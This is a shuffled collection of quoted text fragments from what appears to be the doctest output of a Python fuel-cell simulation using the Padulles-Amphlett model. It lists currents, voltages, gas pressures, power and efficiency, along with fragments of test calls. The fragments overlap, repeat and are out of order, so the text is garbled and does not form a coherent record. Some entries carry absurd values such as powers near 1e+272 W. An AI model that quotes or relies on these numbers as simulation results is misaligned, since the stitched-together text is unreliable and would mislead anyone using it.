0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V", "PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ###########", "V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm", "Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O", "Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O", "W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557", ": 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I", "########### I : 2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V", "PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ###########", "V Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power :", ": 2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration", "0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403", "FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm", "12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 :", "Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V", "leads to minus amount of V, please check your inputs Done! >>> shutil.rmtree(\"Padulles-Amphlett\")", "FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524", ": 1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration", "V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm", "V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm", "2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403 V Eta Activation :", "atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W", "I : 1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta", "PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ###########", "Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic :", "6.731161282259518 W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2 :", ": 5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936 V Eta Activation", "I : 1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta", "0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage", "Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V", "Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615", ": 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal :", "11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 :", ": 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal :", ": 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2", "0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814", "V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency", "Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2", "6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta", ": 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I : 3.4 E :", "2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration :", "Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497", "Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753", "3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration :", "Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5]", "Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581", "6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta", "V Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power :", "Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816", ": 0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923 V Eta Activation", "Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic :", "FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm", "0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage", "PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I : 3.1 E", "Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2", "Power-Thermal : 8.29401625290499 W ########### I : 3.8 E : 6.068358566463993 V Eta", "3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration :", ": 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V", "PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ###########", "Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W", "Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W", "0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss :", "7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power", "atm Power-Thermal : 7.516043371344917 W ########### I : 3.5 E : 6.068363185907339 V", "Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515", "V Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic", "PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ###########", "atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826 V", "Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W", ": 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O :", "V Eta Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power :", "FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm", "0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996", "Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V", ": 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC", ": 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E :", "0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555", "Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V", "V Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power :", ": 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC", "W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996", ": -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss", "Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency :", ": 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V", "Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency :", "Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency :", "V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency", ": 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I", "8.818208962422144 W ########### Report is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5]", "V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage :", "PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ###########", "atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046 V", "FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271", ": 4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O :", "atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W", "Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W", "0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power", ": 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss", "0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879", ": 7.516043371344917 W ########### I : 3.5 E : 6.068363185907339 V Eta Activation", ": 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O :", "4.041762851824391 W ########### I : 2.1 E : 6.068384735676256 V Eta Activation :", "W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117", "0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss :", "W ########### I : 3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543", "0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I :", "atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I : 3.1", ": 8.29401625290499 W ########### I : 3.8 E : 6.068358566463993 V Eta Activation", "Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V", "Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W", ": 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V", "FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976", "13.035960331860592 W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2 :", "Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic :", "0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I : 3.2 E : 6.068367804773196", "Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic :", "Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V", "Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V", "I : 3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta", ": 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I", "########### I : 1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V", "Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V", "1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration :", "FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm", "W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145", "Power-Thermal : 7.774225509105296 W ########### I : 3.6 E : 6.068361646157063 V Eta", ": 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V", ": 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal :", "W ########### I : 2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167", "I : 0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta", ": 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC", "PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E", "Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443", "E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025", ": 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2", "FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm", ": 0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration", "V Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power :", ">>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I :", ": 5.004572056867657 W ########### I : 2.5 E : 6.068378579881878 V Eta Activation", ": 4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O :", "0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I :", "9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012", "FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117", "I : 0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta", "Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V", "PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal", "8.555574184086693 W ########### I : 3.9 E : 6.068357026521189 V Eta Activation :", "V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm", "V Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power :", "4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434", "E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115", "0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss :", "PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I : 1.8 E", "atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W", "3.338951337284836 W ########### I : 1.8 E : 6.068389351849069 V Eta Activation :", "V Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency", ": 0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration", "4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396", ": 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC", "V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm", ": 2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration", "PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal", "Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1 E : 6.14455344314445", "Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V", "atm Power-Thermal : 7.774225509105296 W ########### I : 3.6 E : 6.068361646157063 V", "6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta", "E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468", "atm Power-Thermal : 6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435 V", "atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8", "0.55589469312397 FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss :", "V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm", "W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923", "Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W", "atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W", "E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05", "atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7", "V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm", "atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326 V", "6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta", "Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417", "Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943", "PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal", "Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107", "Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2", "Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency :", "0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC", ": 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 :", "Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269", "V Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power :", "Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847", "V Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic", "V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage :", "5.004572056867657 W ########### I : 2.5 E : 6.068378579881878 V Eta Activation :", "0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss :", "V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm", "W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075", "0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556", ": 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss", "7.879484179737301 W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2 :", "FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270", "Power-Thermal : 1.781480108817652 W ########### I : 1.1 E : 6.068400120676597 V Eta", "0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC", "2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration :", "0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power", "V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage :", "Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O", ": 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ... Warning", "Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic :", "########### I : 1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V", ": 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V", "PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal", "V Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power :", "Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343", ": 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal :", "E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755", "Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304", "PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal", "atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W", "PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I : 2.1 E", ": 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I : 2.2 E :", ": 5.495727044129421 W ########### I : 2.7 E : 6.068375501600038 V Eta Activation", "0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693", "Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"]", "PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ###########", ">>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . .", "8.635132823818928 W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2 :", "Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic :", ": 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2", "W ########### I : 0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736", "V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm", "Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic :", "0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration :", "Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency :", ": 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC", "PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal", "4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165", "PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal", "atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I : 2.4", "V Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic", "Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W", "FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm", "W ########### I : 0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426", ": 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I", "Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V", "atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W", "Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O", "4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688", "Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552", ": 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss", "########### I : 2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V", ": 9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826 V Eta Activation", "E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061", "Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2", "Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O", ": 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss", "W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706", "Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O", "0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration :", ": 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC", "I : 0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta", "4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727", ": 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I : 1.4 E :", "0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I :", "V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm", "4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273", ": 1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729 V Eta Activation", "atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182 V", ": 4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O :", "Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196", "Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2", ": 4.041762851824391 W ########### I : 2.1 E : 6.068384735676256 V Eta Activation", ": 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss", "0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss :", "Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861", ": 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I", "0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC", "FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143", "2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power", "FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057", ": 7.259039668139408 W ########### I : 3.4 E : 6.06836472559345 V Eta Activation", "0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I : 0.5 E : 6.068409348602667", "0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556 V Eta Activation :", "PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal", "V PH2 : 0.1967632812659846 atm PH2O : 